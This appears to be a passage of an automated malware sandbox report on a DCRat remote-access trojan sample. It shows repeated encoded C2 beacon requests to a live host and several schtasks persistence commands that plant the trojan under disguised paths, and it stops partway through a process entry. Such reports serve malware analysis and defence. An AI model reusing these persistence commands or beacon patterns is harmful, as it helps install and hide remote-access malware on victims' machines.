May 24, 2024 11:08:24.397114038 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:29.412646055 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:08:30.136791945 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:35.439461946 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:08:36.131242037 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:42.357044935 CEST	2132	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0Z [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:08:43.040803909 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:48.067573071 CEST	2158	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:08:48.759102106 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:53.771653891 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:08:54.474562883 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:59.485892057 CEST	2158	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:09:00.170661926 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:09:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Target ID:	0
Start time:	05:06:56
Start date:	24/05/2024
Path:	C:\Users\user\Desktop\N0tepkRPzw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\N0tepkRPzw.exe"
Imagebase:	0xd50000
File size:	1'806'983 bytes
MD5 hash:	4B173AAA031DE977353CA903F23520E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:06:56
Start date:	24/05/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe"
Imagebase:	0xfb0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:07:03
Start date:	24/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:07:03
Start date:	24/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:07:03
Start date:	24/05/2024
Path:	C:\bridgeportserver\blockServerruntime.exe
Wow64 process (32bit):	false
Commandline:	"C:\bridgeportserver\blockServerruntime.exe"
Imagebase:	0x90000
File size:	1'257'984 bytes
MD5 hash:	A6A0FB77338508B4185FE94263AA2D0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1737024457.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs Detection: 68%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 5 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Imagebase:	0x7ff71e800000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
Imagebase:	0x110000
File size:	1'257'984 bytes
MD5 hash:	A6A0FB77338508B4185FE94263AA2D0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs Detection: 68%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
Imagebase:	0x4a0000
File size:	1'257'984 bytes
MD5 hash:	A6A0FB77338508B4185FE94263AA2D0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.1828726317.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 10 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
